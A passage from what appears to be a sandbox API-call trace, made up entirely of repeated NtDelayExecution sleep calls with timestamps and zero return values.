(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.950] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.955] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.961] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.968] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.971] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.975] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.984] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.987] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.988] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.996] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0124.999] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.013] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.016] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.018] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.021] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.024] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.039] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.042] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.053] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.054] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.056] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.058] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.062] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.068] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.078] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.081] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.083] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.084] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.090] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.096] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.099] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.101] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.120] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.139] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.148] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.155] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.164] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.172] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.175] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.177] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.178] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.180] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.183] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.186] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.189] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.195] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.197] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.198] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.204] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.210] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.224] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.225] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.227] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.231] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.237] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.240] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.242] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.243] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.264] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.267] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.338] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.355] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.417] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.513] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.540] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0125.565] NtDelayExecution 